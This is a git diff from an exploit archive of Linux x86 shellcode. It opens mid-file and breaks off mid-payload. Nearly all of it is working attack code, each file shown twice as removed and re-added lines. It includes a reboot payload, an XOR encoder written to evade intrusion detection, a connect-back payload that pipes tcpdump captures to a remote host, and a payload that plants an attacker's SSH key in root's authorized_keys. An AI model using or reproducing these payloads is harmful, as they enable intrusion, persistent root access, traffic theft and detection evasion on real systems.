%esp,%edx + 804806f: 53 push %ebx + 8048070: 89 e1 mov %esp,%ecx + 8048072: b0 0b mov $0xb,%al + 8048074: cd 80 int $0x80 + +*/ + +#include "stdio.h" + +int main(int argc, char *argv[]) +{ + + char shellcode[] = "\x31\xc0\x50\x66\x68\x6c" + "\x35\x68\x6c\x6c\x61\x6c" + "\x68\x6e\x2f\x6b\x69\x68" + "\x2f\x73\x62\x69\x89\xe3" + "\x50\x89\xe2\x53\x89\xe1" + "\xb0\x0b\xcd\x80"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); + + return 0; +} + // milw0rm.com [2009-02-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13327.c b/platforms/lin_x86/shellcode/13327.c index e50f10eb8..25274da10 100755 --- a/platforms/lin_x86/shellcode/13327.c +++ b/platforms/lin_x86/shellcode/13327.c 
@@ -1,43 +1,43 @@ -/* Linux x86 PUSH reboot() - 30 bytes - * Jonathan Salwan - * Web: http://racprojet.zapto.org - * - * Disassembly of section .text: - * - * 08048054 <.text>: - * 8048054: 31 c0 xor %eax,%eax - * 8048056: 50 push %eax - * 8048057: 68 62 6f 6f 74 push $0x746f6f62 - * 804805c: 68 6e 2f 72 65 push $0x65722f6e - * 8048061: 68 2f 73 62 69 push $0x6962732f - * 8048066: 89 e3 mov %esp,%ebx - * 8048068: 50 push %eax - * 8048069: 89 e2 mov %esp,%edx - * 804806b: 53 push %ebx - * 804806c: 89 e1 mov %esp,%ecx - * 804806e: b0 0b mov $0xb,%al - * 8048070: cd 80 int $0x80 - * - */ - -main() -{ -char shellcode[] = - "\x31\xc0" - "\x50" - "\x68\x62\x6f\x6f\x74" - "\x68\x6e\x2f\x72\x65" - "\x68\x2f\x73\x62\x69" - "\x89\xe3" - "\x50" - "\x89\xe2" - "\x53" - "\x89\xe1" - "\xb0\x0b" - "\xcd\x80"; - - printf("Length: %d\n",strlen(shellcode)); - (*(void(*)()) shellcode)(); -} - +/* Linux x86 PUSH reboot() - 30 bytes + * Jonathan Salwan + * Web: http://racprojet.zapto.org + * + * Disassembly of section .text: + * + * 08048054 <.text>: + * 8048054: 31 c0 xor %eax,%eax + * 8048056: 50 push %eax + * 8048057: 68 62 6f 6f 74 push $0x746f6f62 + * 804805c: 68 6e 2f 72 65 push $0x65722f6e + * 8048061: 68 2f 73 62 69 push $0x6962732f + * 8048066: 89 e3 mov %esp,%ebx + * 8048068: 50 push %eax + * 8048069: 89 e2 mov %esp,%edx + * 804806b: 53 push %ebx + * 804806c: 89 e1 mov %esp,%ecx + * 804806e: b0 0b mov $0xb,%al + * 8048070: cd 80 int $0x80 + * + */ + +main() +{ +char shellcode[] = + "\x31\xc0" + "\x50" + "\x68\x62\x6f\x6f\x74" + "\x68\x6e\x2f\x72\x65" + "\x68\x2f\x73\x62\x69" + "\x89\xe3" + "\x50" + "\x89\xe2" + "\x53" + "\x89\xe1" + "\xb0\x0b" + "\xcd\x80"; + + printf("Length: %d\n",strlen(shellcode)); + (*(void(*)()) shellcode)(); +} + // milw0rm.com [2009-01-16] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13328.c b/platforms/lin_x86/shellcode/13328.c index adb62e528..80073da2a 100755 --- a/platforms/lin_x86/shellcode/13328.c 
+++ b/platforms/lin_x86/shellcode/13328.c 
@@ -1,223 +1,223 @@ -/* -* sm4x - 2008 => sm4x0rcist [a7] gmail [d07] com -* - sh3llc0der.c v0.1 (beta) -* - (elf binary) shellcode encryptor, NULL free for IDS payload bypassing -* - key is a simple int for x(x(p)) decryption(encryption(p)) (modify to add/subtract if needed) -* - if you find bugs i dont wanna know -> fix them and its urs -* - watch for 0x0a, 0x0d warnings for \r\n as they get mucked in most str** calls -* -* nb: nasm ur files with -felf, then ld -o them (u know) -* usage: ./sh3llc0der [options] binaryfile -* - output is a encoded byte array (or raw binary if -o is specified) -* - it was easier for me to write it directly hooking to the elf struct -> but you can change it (only took 3 hours so ITS BUGGY!) -* -*/ - -#include -#include -#include -#include -#include -#include - -char decoder[] = "\xeb\x10\x5e\x31\xc9" - "\xb1\x00\x80\x74\x0e" // \x00 location of payload size - "\xff\x00\xfe\xc9\x75" // \x00 location of xor key - "\xf7\xeb\x05\xe8\xeb" - "\xff\xff\xff"; - -int getkey(int i) { - int seed; - struct timeval tm; - gettimeofday(&tm, NULL); - seed = tm.tv_sec + tm.tv_usec; srandom(seed); - return (random() % i) +1; -} - -void usage() { - printf("Usage: sh3llc0der [options] shellcode\n"); - printf("\tv - verbose\n"); - printf("\to [outfile] - out file (stdout is default)\n"); - printf("\tn [size] - generate with NOP sled of size length (minus decoder)\n"); - printf("\tr - randomize NOP sled with other operations\n"); - printf("\t? 
- this crud\n"); -} - -int main(int argc, char **argv) { - Elf32_Ehdr elfhdr; Elf32_Phdr dataseg; Elf32_Phdr txtseg; - - int found_txt_seg = 0; int i = 0; int r = 0; int len = 0; int key = 0; - int include_noop_instructions = 0; int noop_length = 0; int use_nop_randomization = 0; - int write_file = 0; int is_verbose = 0; - unsigned char c; unsigned char *b = NULL; unsigned char *nb = NULL; - char *upayload = NULL; char *outfile = NULL; - unsigned int payload_offset = 0; unsigned int payload_size = 0; - int (*func)(); - - opterr = 0; int option = 1; - while((option = getopt(argc, argv, "vrn:o:?")) != -1 ) { - switch(option) { - case 'v': - is_verbose = 1; - break; - case 'o': - write_file = 1; - outfile = optarg; - if(outfile != NULL) { printf("[+] writing shellcode to: %s\n", outfile); } - break; - case 'n': - if(optarg != NULL) noop_length = atoi(optarg); else break; - include_noop_instructions = 1; - break; - case 'r': - use_nop_randomization = 1; - break; - case '?': - usage(); exit(0); - break; - default: - // nothing - break; - }; - } - - if(argc < 2) { usage(); exit(0); } - printf("[+] sh3llc0der - sm4x 2008\n"); - - upayload = argv[argc-1]; if(upayload == outfile) { printf("[-] ummm no\n"); usage(); exit(-1); } - - if(is_verbose) { printf("[?] opening %s\n", upayload); } - FILE *p = fopen(upayload, "rb"); - if(p == NULL) { printf("[-] null file - nice try\n"); exit(-1); } - - fseek(p, 0, SEEK_END); - len = ftell(p); rewind(p); - if(len <= 0) { printf("[-] 0 len file - nice try\n"); exit(-1); } - - /* adjust our noop length for the decoder size */ - - if(include_noop_instructions && noop_length > sizeof(decoder)) { noop_length -= sizeof(decoder); } - printf("[+] shellcode length: %d Bytes\n", len); - - b = (char *) malloc(sizeof(char)*len); - if(b == NULL) { printf("[-] unable to buffer shellcode - nice try again!\n"); exit(-1); } - - if(is_verbose) { printf("[?] 
reading %s....\n", upayload); } - r = fread(b, 1, len, p); - if(r != len) { printf("[-] **warning** - unable to load the entire file into buffer!\n"); } - fclose(p); p = NULL; - if(is_verbose) { printf("[?] file %s seems ok with %d size\n", upayload, len); } - - /* get our ELF header out of the binary */ - memcpy(&elfhdr, (void *)b, sizeof(Elf32_Ehdr)); - - printf("[+] Starting address: 0x%x\n", elfhdr.e_entry); - /* seek to our offset */ - printf("[+] Offset @ 0x%x\n", elfhdr.e_phoff); - - /* loop for seg offset (you're gonna crash here if its not a proper elf binary -> don't really care!! lol) */ - for(i = 0;i < elfhdr.e_phnum; i++) { - /* copy in our txtseg what we think* to be the appropriate header (p_offset == 0 means text) */ - memcpy(&txtseg, &b[(sizeof(Elf32_Ehdr)) + (i * sizeof(Elf32_Phdr))], sizeof(Elf32_Phdr)); - if(txtseg.p_filesz > 0 && txtseg.p_offset == 0) { - printf("[+] .text segment found, len: 0x%x|0x%x @ V:0x%x P:0x%x off: 0x%x\n", - txtseg.p_filesz, txtseg.p_memsz, txtseg.p_vaddr, txtseg.p_vaddr, txtseg.p_offset); - found_txt_seg = 1; break; - } else { - found_txt_seg = 0; - } - } if(!found_txt_seg) { printf("[-] could not find .text segment for encoding!\n"); exit(-1); } - - /* calculations for start of .text with offset (usually 0) */ - payload_size = (txtseg.p_vaddr + txtseg.p_filesz) - elfhdr.e_entry; - payload_offset = (txtseg.p_offset + txtseg.p_filesz) - payload_size; - - printf("[+] calc offset: 0x%x | 0x%x -> (SHELLCODE SIZE: %d Bytes)\n", payload_offset, payload_size, payload_size); - - int new_payload_size = noop_length+payload_size+sizeof(decoder)-1; - - nb = (char *) malloc(sizeof(char) * new_payload_size); - if(nb == NULL) { printf("[-] error creating copy payload - nice try\n"); exit(-1); } - memset(nb, 0x0, sizeof(char) * new_payload_size); // just in case - clean it out - - // ensure we have a NULL free xor'd shellcode -> keep trying until we do - int is_null = 0; int warn = 0; int attempts = 0; - while(1) { - if(attempts > 
20) { printf("[-] somthing is very wrong!! please check the binary\n"); exit(-1); } - key = getkey(255); - for(i = 0; i < payload_size; i++) { - c = b[payload_offset+i]; c ^= key; - if(c == 0x00) { printf("[!] ERR: 0x%x on key: %d\n", b[payload_offset+i], key); is_null = 1; break; } - if(c == 0x0a || c == 0x0d) { printf("[!] WARN: 0x%x on key: %d\n", b[payload_offset+i], key); warn =1; } - } attempts++; - if(is_null) { printf("[-] NULL found.. regenerating now... try=%d\n", attempts); is_null = 0; usleep(100); continue; } - - if(warn) { printf("[!] WARN: invalid hex was found in this shellcode -> this may* not pass some string functions!\n"); } - if(is_verbose) { printf("[?] running xor-enc on payload now (key=%d @ %x attempts)...\n", key, attempts); } - - /* fill our new buffer -nb*/ - for(i = 0; i < payload_size; i++) { - nb[noop_length+sizeof(decoder)-1+i] = b[payload_offset+i]; - if(is_verbose) { printf("\\x%.2x", b[payload_offset+i]); } - nb[noop_length+sizeof(decoder)-1+i] ^= key; - } break; - } if(is_verbose) { printf("\n"); } - if(!warn) { printf("[+] done xor-enc on payload (NULL FREE)...\n"); } else { printf("[!] (check warnings!!) 
some problems with xor-enc (NULL FREE)...\n"); } - - for(i = 0; i < noop_length+payload_size-1; i++) printf("\\x%.2x", nb[sizeof(decoder)+i]); - - /* we need to set our primary instructions to decode with xor */ - decoder[6] = payload_size; decoder[11] = key; - - printf("\n"); - if(include_noop_instructions) { - printf("[+] prepending %d (%d = minus decoder len) NOOPs...\n", noop_length+sizeof(decoder), noop_length); - // minus the decoder size - if(use_nop_randomization) { - for(i = 0; i < noop_length; i++) { - int p = getkey(5); - // hardly random - but change to modify the primary sled sig - switch((int)p) { - case 1: nb[i] = 0x90; break; - case 2: nb[i] = 0x40; nb[i+1] = 0x48; i++; break; - case 3: nb[i] = 0x50; break; - case 4: nb[i] = 0x58; break; - case 5: nb[i] = 0x99; break; - default: nb[i] = 0x90; break; - }; - } - } else { - for(i = 0; i < noop_length; i++) nb[i] = 0x90; - } - } - - printf("[+] adding decoder of %d Bytes (total= %d Bytes)...\n", sizeof(decoder), sizeof(decoder)+payload_size); - memcpy(nb+noop_length, decoder, sizeof(decoder)-1); - for(i = 0; i < noop_length+payload_size+sizeof(decoder)-1; i++) printf("\\x%.2x", nb[i]); - printf("\n"); - - if(write_file) { - printf("[+] writing payload to: %s\n", outfile); - FILE *w = fopen(outfile, "wb"); - if(w == NULL) { printf("[-] Unable to open file: %s\n", outfile); goto continue_test; } - int bytes = fprintf(w, nb, sizeof(decoder)+payload_size, 0); - fclose(w); - printf("[+] done %d written.\n", bytes); - } - - continue_test: - printf("[+] testing payload now ...\n"); - printf("[-] if shellcode tests bad something has gone horribly wrong - do NOT continue with payload...\n"); - - /* if this mashes out ie: seg fault -> then DO NOT use the shellcode on an exploit -> ur gonna crash the shit */ - func = (int (*)()) nb; - (int)(*func)(); - - // should never get here really - - cleanup: - if(p != NULL) fclose(p); - return 0; -} - +/* +* sm4x - 2008 => sm4x0rcist [a7] gmail [d07] com +* - sh3llc0der.c 
v0.1 (beta) +* - (elf binary) shellcode encryptor, NULL free for IDS payload bypassing +* - key is a simple int for x(x(p)) decryption(encryption(p)) (modify to add/subtract if needed) +* - if you find bugs i dont wanna know -> fix them and its urs +* - watch for 0x0a, 0x0d warnings for \r\n as they get mucked in most str** calls +* +* nb: nasm ur files with -felf, then ld -o them (u know) +* usage: ./sh3llc0der [options] binaryfile +* - output is a encoded byte array (or raw binary if -o is specified) +* - it was easier for me to write it directly hooking to the elf struct -> but you can change it (only took 3 hours so ITS BUGGY!) +* +*/ + +#include +#include +#include +#include +#include +#include + +char decoder[] = "\xeb\x10\x5e\x31\xc9" + "\xb1\x00\x80\x74\x0e" // \x00 location of payload size + "\xff\x00\xfe\xc9\x75" // \x00 location of xor key + "\xf7\xeb\x05\xe8\xeb" + "\xff\xff\xff"; + +int getkey(int i) { + int seed; + struct timeval tm; + gettimeofday(&tm, NULL); + seed = tm.tv_sec + tm.tv_usec; srandom(seed); + return (random() % i) +1; +} + +void usage() { + printf("Usage: sh3llc0der [options] shellcode\n"); + printf("\tv - verbose\n"); + printf("\to [outfile] - out file (stdout is default)\n"); + printf("\tn [size] - generate with NOP sled of size length (minus decoder)\n"); + printf("\tr - randomize NOP sled with other operations\n"); + printf("\t? 
- this crud\n"); +} + +int main(int argc, char **argv) { + Elf32_Ehdr elfhdr; Elf32_Phdr dataseg; Elf32_Phdr txtseg; + + int found_txt_seg = 0; int i = 0; int r = 0; int len = 0; int key = 0; + int include_noop_instructions = 0; int noop_length = 0; int use_nop_randomization = 0; + int write_file = 0; int is_verbose = 0; + unsigned char c; unsigned char *b = NULL; unsigned char *nb = NULL; + char *upayload = NULL; char *outfile = NULL; + unsigned int payload_offset = 0; unsigned int payload_size = 0; + int (*func)(); + + opterr = 0; int option = 1; + while((option = getopt(argc, argv, "vrn:o:?")) != -1 ) { + switch(option) { + case 'v': + is_verbose = 1; + break; + case 'o': + write_file = 1; + outfile = optarg; + if(outfile != NULL) { printf("[+] writing shellcode to: %s\n", outfile); } + break; + case 'n': + if(optarg != NULL) noop_length = atoi(optarg); else break; + include_noop_instructions = 1; + break; + case 'r': + use_nop_randomization = 1; + break; + case '?': + usage(); exit(0); + break; + default: + // nothing + break; + }; + } + + if(argc < 2) { usage(); exit(0); } + printf("[+] sh3llc0der - sm4x 2008\n"); + + upayload = argv[argc-1]; if(upayload == outfile) { printf("[-] ummm no\n"); usage(); exit(-1); } + + if(is_verbose) { printf("[?] opening %s\n", upayload); } + FILE *p = fopen(upayload, "rb"); + if(p == NULL) { printf("[-] null file - nice try\n"); exit(-1); } + + fseek(p, 0, SEEK_END); + len = ftell(p); rewind(p); + if(len <= 0) { printf("[-] 0 len file - nice try\n"); exit(-1); } + + /* adjust our noop length for the decoder size */ + + if(include_noop_instructions && noop_length > sizeof(decoder)) { noop_length -= sizeof(decoder); } + printf("[+] shellcode length: %d Bytes\n", len); + + b = (char *) malloc(sizeof(char)*len); + if(b == NULL) { printf("[-] unable to buffer shellcode - nice try again!\n"); exit(-1); } + + if(is_verbose) { printf("[?] 
reading %s....\n", upayload); } + r = fread(b, 1, len, p); + if(r != len) { printf("[-] **warning** - unable to load the entire file into buffer!\n"); } + fclose(p); p = NULL; + if(is_verbose) { printf("[?] file %s seems ok with %d size\n", upayload, len); } + + /* get our ELF header out of the binary */ + memcpy(&elfhdr, (void *)b, sizeof(Elf32_Ehdr)); + + printf("[+] Starting address: 0x%x\n", elfhdr.e_entry); + /* seek to our offset */ + printf("[+] Offset @ 0x%x\n", elfhdr.e_phoff); + + /* loop for seg offset (you're gonna crash here if its not a proper elf binary -> don't really care!! lol) */ + for(i = 0;i < elfhdr.e_phnum; i++) { + /* copy in our txtseg what we think* to be the appropriate header (p_offset == 0 means text) */ + memcpy(&txtseg, &b[(sizeof(Elf32_Ehdr)) + (i * sizeof(Elf32_Phdr))], sizeof(Elf32_Phdr)); + if(txtseg.p_filesz > 0 && txtseg.p_offset == 0) { + printf("[+] .text segment found, len: 0x%x|0x%x @ V:0x%x P:0x%x off: 0x%x\n", + txtseg.p_filesz, txtseg.p_memsz, txtseg.p_vaddr, txtseg.p_vaddr, txtseg.p_offset); + found_txt_seg = 1; break; + } else { + found_txt_seg = 0; + } + } if(!found_txt_seg) { printf("[-] could not find .text segment for encoding!\n"); exit(-1); } + + /* calculations for start of .text with offset (usually 0) */ + payload_size = (txtseg.p_vaddr + txtseg.p_filesz) - elfhdr.e_entry; + payload_offset = (txtseg.p_offset + txtseg.p_filesz) - payload_size; + + printf("[+] calc offset: 0x%x | 0x%x -> (SHELLCODE SIZE: %d Bytes)\n", payload_offset, payload_size, payload_size); + + int new_payload_size = noop_length+payload_size+sizeof(decoder)-1; + + nb = (char *) malloc(sizeof(char) * new_payload_size); + if(nb == NULL) { printf("[-] error creating copy payload - nice try\n"); exit(-1); } + memset(nb, 0x0, sizeof(char) * new_payload_size); // just in case - clean it out + + // ensure we have a NULL free xor'd shellcode -> keep trying until we do + int is_null = 0; int warn = 0; int attempts = 0; + while(1) { + if(attempts > 
20) { printf("[-] somthing is very wrong!! please check the binary\n"); exit(-1); } + key = getkey(255); + for(i = 0; i < payload_size; i++) { + c = b[payload_offset+i]; c ^= key; + if(c == 0x00) { printf("[!] ERR: 0x%x on key: %d\n", b[payload_offset+i], key); is_null = 1; break; } + if(c == 0x0a || c == 0x0d) { printf("[!] WARN: 0x%x on key: %d\n", b[payload_offset+i], key); warn =1; } + } attempts++; + if(is_null) { printf("[-] NULL found.. regenerating now... try=%d\n", attempts); is_null = 0; usleep(100); continue; } + + if(warn) { printf("[!] WARN: invalid hex was found in this shellcode -> this may* not pass some string functions!\n"); } + if(is_verbose) { printf("[?] running xor-enc on payload now (key=%d @ %x attempts)...\n", key, attempts); } + + /* fill our new buffer -nb*/ + for(i = 0; i < payload_size; i++) { + nb[noop_length+sizeof(decoder)-1+i] = b[payload_offset+i]; + if(is_verbose) { printf("\\x%.2x", b[payload_offset+i]); } + nb[noop_length+sizeof(decoder)-1+i] ^= key; + } break; + } if(is_verbose) { printf("\n"); } + if(!warn) { printf("[+] done xor-enc on payload (NULL FREE)...\n"); } else { printf("[!] (check warnings!!) 
some problems with xor-enc (NULL FREE)...\n"); } + + for(i = 0; i < noop_length+payload_size-1; i++) printf("\\x%.2x", nb[sizeof(decoder)+i]); + + /* we need to set our primary instructions to decode with xor */ + decoder[6] = payload_size; decoder[11] = key; + + printf("\n"); + if(include_noop_instructions) { + printf("[+] prepending %d (%d = minus decoder len) NOOPs...\n", noop_length+sizeof(decoder), noop_length); + // minus the decoder size + if(use_nop_randomization) { + for(i = 0; i < noop_length; i++) { + int p = getkey(5); + // hardly random - but change to modify the primary sled sig + switch((int)p) { + case 1: nb[i] = 0x90; break; + case 2: nb[i] = 0x40; nb[i+1] = 0x48; i++; break; + case 3: nb[i] = 0x50; break; + case 4: nb[i] = 0x58; break; + case 5: nb[i] = 0x99; break; + default: nb[i] = 0x90; break; + }; + } + } else { + for(i = 0; i < noop_length; i++) nb[i] = 0x90; + } + } + + printf("[+] adding decoder of %d Bytes (total= %d Bytes)...\n", sizeof(decoder), sizeof(decoder)+payload_size); + memcpy(nb+noop_length, decoder, sizeof(decoder)-1); + for(i = 0; i < noop_length+payload_size+sizeof(decoder)-1; i++) printf("\\x%.2x", nb[i]); + printf("\n"); + + if(write_file) { + printf("[+] writing payload to: %s\n", outfile); + FILE *w = fopen(outfile, "wb"); + if(w == NULL) { printf("[-] Unable to open file: %s\n", outfile); goto continue_test; } + int bytes = fprintf(w, nb, sizeof(decoder)+payload_size, 0); + fclose(w); + printf("[+] done %d written.\n", bytes); + } + + continue_test: + printf("[+] testing payload now ...\n"); + printf("[-] if shellcode tests bad something has gone horribly wrong - do NOT continue with payload...\n"); + + /* if this mashes out ie: seg fault -> then DO NOT use the shellcode on an exploit -> ur gonna crash the shit */ + func = (int (*)()) nb; + (int)(*func)(); + + // should never get here really + + cleanup: + if(p != NULL) fclose(p); + return 0; +} + // milw0rm.com [2008-12-09] \ No newline at end of file 
diff --git a/platforms/lin_x86/shellcode/13329.c b/platforms/lin_x86/shellcode/13329.c index 861a98053..9355edc6c 100755 --- a/platforms/lin_x86/shellcode/13329.c +++ b/platforms/lin_x86/shellcode/13329.c 
@@ -1,96 +1,96 @@ -/* - linux/x86 connect-back port UDP/54321 & dup2 & - fork() & execve() /usr/bin/tcpdump -iany -w- "port ! 54321" - 151 bytes - by XenoMuta - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta [ arroba ] phreaker [ punto ] net - - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - - God bless you all - - -*/ -unsigned char sc[] = -// <_start>: -"\x6a\x66" // push $0x66 ; socketcall() -"\x58" // pop %eax ; para setear el socket -"\x6a\x01" // push $0x1 -"\x5b" // pop %ebx -"\x31\xc9" // xor %ecx,%ecx -"\x51" // push %ecx -"\x6a\x02" // push $0x2 ; SOCK_DGRAM (udp) -"\x6a\x02" // push $0x2 -"\x89\xe1" // mov %esp,%ecx -"\xcd\x80" // int $0x80 -// IP: 127.1.1.1 -"\x68\x7f\x01\x01\x01" // push $0x101017f -// Port: 54321 -"\x66\x68\xd4\x31" // pushw $0x31d4 -"\x66\x31\xc9" // xor %cx,%cx -"\x80\xc1\x02" // xadd $0x2,%cl -"\x66\x51" // push %cx -"\x89\xe1" // mov %esp,%ecx -"\x6a\x10" // push $0x10 -"\x51" // push %ecx -"\x50" // push %eax -"\x89\xe1" // mov %esp,%ecx -"\x89\xc6" // mov %eax,%esi -"\xb0\x66" // mov $0x66,%al ; socketcall () -"\x80\xc3\x02" // add $0x2,%bl ; para connect() -"\xcd\x80" // int $0x80 -"\x87\xde" // xchg %ebx,%esi -"\x6a\x01" // push $0x1 -"\x59" // pop %ecx -"\x6a\x3f" // push $0x3f ; dup2(socket, stdout) -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x31\xd2" // xor %edx,%edx -"\x6a\x02" // push $0x2 ; fork() -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -"\x39\xd0" // cmp %edx,%eax ; el hijo sobrevive -"\x74\x05" // je 0x4d <_child> -"\x6a\x01" // push $0x1 ; adios papa -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -//<_child>: -"\x6a\x0b" // push $0xb ; execve() tcpdump -iany -w- "port ! 54321" -"\x58" // pop %eax ; sniffea todo menos a mi mismo. -"\x52" // push %edx -"\x68\x34\x33\x32\x31" // push $0x31323334 ; "port ! 
54321" -"\x68\x20\x21\x20\x35" // push $0x35202120 -"\x68\x70\x6f\x72\x74" // push $0x74726f70 -"\x89\xe7" // mov %esp,%edi -"\x52" // push %edx -"\x6a\x2d" // push $0x2d ; -w- ( escribe a stdout ) -"\x66\x68\x2d\x77" // pushw $0x772d -"\x89\xe6" // mov %esp,%esi -"\x52" // push %edx -"\x6a\x79" // push $0x79 ; -iany (todas las interfaces ) -"\x68\x2d\x69\x61\x6e" // push $0x6e61692d -"\x89\xe1" // mov %esp,%ecx -"\x52" // push %edx -"\x6a\x70" // push $0x70 -"\x68\x70\x64\x75\x6d" // push $0x6d756470 ; /usr/bin/tcpdump -"\x68\x6e\x2f\x74\x63" // push $0x63742f6e -"\x68\x2f\x73\x62\x69" // push $0x6962732f -"\x68\x2f\x75\x73\x72" // push $0x7273752f -"\x89\xe3" // mov %esp,%ebx -"\x52" // push %edx -"\x57" // push %edi -"\x56" // push %esi -"\x51" // push %ecx -"\x53" // push %ebx -"\x89\xe1" // mov %esp,%ecx -"\xcd\x80"; // int $0x80 - - -main(){(*(void (*)()) sc)();} - +/* + linux/x86 connect-back port UDP/54321 & dup2 & + fork() & execve() /usr/bin/tcpdump -iany -w- "port ! 54321" + 151 bytes + by XenoMuta + _ __ __ ___ __ + | |/ /__ ____ ____ / |/ /_ __/ /_____ _ + | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ + / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / + /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ + + xenomuta [ arroba ] phreaker [ punto ] net + + http://xenomuta.tuxfamily.org/ - Methylxantina 256mg + + - God bless you all - + +*/ +unsigned char sc[] = +// <_start>: +"\x6a\x66" // push $0x66 ; socketcall() +"\x58" // pop %eax ; para setear el socket +"\x6a\x01" // push $0x1 +"\x5b" // pop %ebx +"\x31\xc9" // xor %ecx,%ecx +"\x51" // push %ecx +"\x6a\x02" // push $0x2 ; SOCK_DGRAM (udp) +"\x6a\x02" // push $0x2 +"\x89\xe1" // mov %esp,%ecx +"\xcd\x80" // int $0x80 +// IP: 127.1.1.1 +"\x68\x7f\x01\x01\x01" // push $0x101017f +// Port: 54321 +"\x66\x68\xd4\x31" // pushw $0x31d4 +"\x66\x31\xc9" // xor %cx,%cx +"\x80\xc1\x02" // xadd $0x2,%cl +"\x66\x51" // push %cx +"\x89\xe1" // mov %esp,%ecx +"\x6a\x10" // push $0x10 +"\x51" // push %ecx +"\x50" // push %eax 
+"\x89\xe1" // mov %esp,%ecx +"\x89\xc6" // mov %eax,%esi +"\xb0\x66" // mov $0x66,%al ; socketcall () +"\x80\xc3\x02" // add $0x2,%bl ; para connect() +"\xcd\x80" // int $0x80 +"\x87\xde" // xchg %ebx,%esi +"\x6a\x01" // push $0x1 +"\x59" // pop %ecx +"\x6a\x3f" // push $0x3f ; dup2(socket, stdout) +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x31\xd2" // xor %edx,%edx +"\x6a\x02" // push $0x2 ; fork() +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +"\x39\xd0" // cmp %edx,%eax ; el hijo sobrevive +"\x74\x05" // je 0x4d <_child> +"\x6a\x01" // push $0x1 ; adios papa +"\x58" // pop %eax +"\xcd\x80" // int $0x80 +//<_child>: +"\x6a\x0b" // push $0xb ; execve() tcpdump -iany -w- "port ! 54321" +"\x58" // pop %eax ; sniffea todo menos a mi mismo. +"\x52" // push %edx +"\x68\x34\x33\x32\x31" // push $0x31323334 ; "port ! 54321" +"\x68\x20\x21\x20\x35" // push $0x35202120 +"\x68\x70\x6f\x72\x74" // push $0x74726f70 +"\x89\xe7" // mov %esp,%edi +"\x52" // push %edx +"\x6a\x2d" // push $0x2d ; -w- ( escribe a stdout ) +"\x66\x68\x2d\x77" // pushw $0x772d +"\x89\xe6" // mov %esp,%esi +"\x52" // push %edx +"\x6a\x79" // push $0x79 ; -iany (todas las interfaces ) +"\x68\x2d\x69\x61\x6e" // push $0x6e61692d +"\x89\xe1" // mov %esp,%ecx +"\x52" // push %edx +"\x6a\x70" // push $0x70 +"\x68\x70\x64\x75\x6d" // push $0x6d756470 ; /usr/bin/tcpdump +"\x68\x6e\x2f\x74\x63" // push $0x63742f6e +"\x68\x2f\x73\x62\x69" // push $0x6962732f +"\x68\x2f\x75\x73\x72" // push $0x7273752f +"\x89\xe3" // mov %esp,%ebx +"\x52" // push %edx +"\x57" // push %edi +"\x56" // push %esi +"\x51" // push %ecx +"\x53" // push %ebx +"\x89\xe1" // mov %esp,%ecx +"\xcd\x80"; // int $0x80 + + +main(){(*(void (*)()) sc)();} + // milw0rm.com [2008-11-23] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13330.c b/platforms/lin_x86/shellcode/13330.c index d9f748997..b9404364a 100755 --- a/platforms/lin_x86/shellcode/13330.c +++ b/platforms/lin_x86/shellcode/13330.c 
@@ -1,104 +1,104 @@ -/* - linux/x86 shellcode to append rsa key to /root/.ssh/authorized_keys2 - keys found at http://xenomuta.tuxfamily.org/exploits/authkey/ - ssh -i id_rsa_pwn root@pwned-host - - 295 bytes - by XenoMuta - _ __ __ ___ __ - | |/ /__ ____ ____ / |/ /_ __/ /_____ _ - | / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/ - / / __/ / / / /_/ / / / / /_/ / /_/ /_/ / - /_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/ - - xenomuta [ arroba ] phreaker [ punto ] net - - http://xenomuta.tuxfamily.org/ - Methylxantina 256mg - - - God bless you all - - -*/ -unsigned char sc[] = -//<_start>: -"\x31\xd2" // xor %edx,%edx -"\x52" // push %edx -"\x68\x65\x79\x73\x32" // push $0x32737965 ; /root/.ssh/authorized_keys2 -"\x68\x65\x64\x5f\x6b" // push $0x6b5f6465 -"\x68\x6f\x72\x69\x7a" // push $0x7a69726f -"\x68\x61\x75\x74\x68" // push $0x68747561 -"\x68\x73\x73\x68\x2f" // push $0x2f687373 -"\x68\x74\x2f\x2f\x2e" // push $0x2e2f2f74 -"\x68\x2f\x72\x6f\x6f" // push $0x6f6f722f -"\x89\xe3" // mov %esp,%ebx -"\x66\xb9\x41\x04" // mov $0x441,%cx ; O_CREAT | O_APPEND | O_WRONLY -//<_open>: -"\x6a\x05" // push $0x5 ; sys_open() -"\x58" // pop %eax -"\xcd\x80" // int $0x80 -//<_write>: -"\x93" // xchg %eax,%ebx -"\x89\xe6" // mov %esp,%esi -"\x31\xd2" // xor %edx,%edx -"\x52" // push %edx -"\x6a\x0a" // push $0xa -"\x68\x20\x78\x78\x78" // push $0x78787820 ; contenido de id_rsa_pwn.pub -"\x68\x31\x35\x54\x4a" // push $0x4a543531 -"\x68\x56\x39\x48\x57" // push $0x57483956 -"\x68\x6d\x75\x2b\x38" // push $0x382b756d -"\x68\x31\x35\x64\x31" // push $0x31643531 -"\x68\x64\x2f\x71\x69" // push $0x69712f64 -"\x68\x52\x4b\x61\x79" // push $0x79614b52 -"\x68\x70\x70\x79\x6e" // push $0x6e797070 -"\x68\x35\x46\x31\x6d" // push $0x6d314635 -"\x68\x55\x64\x5a\x35" // push $0x355a6455 -"\x68\x4d\x2b\x4c\x63" // push $0x634c2b4d -"\x68\x38\x59\x41\x6d" // push $0x6d415938 -"\x68\x4d\x42\x50\x79" // push $0x7950424d -"\x68\x4c\x44\x4d\x58" // push $0x584d444c 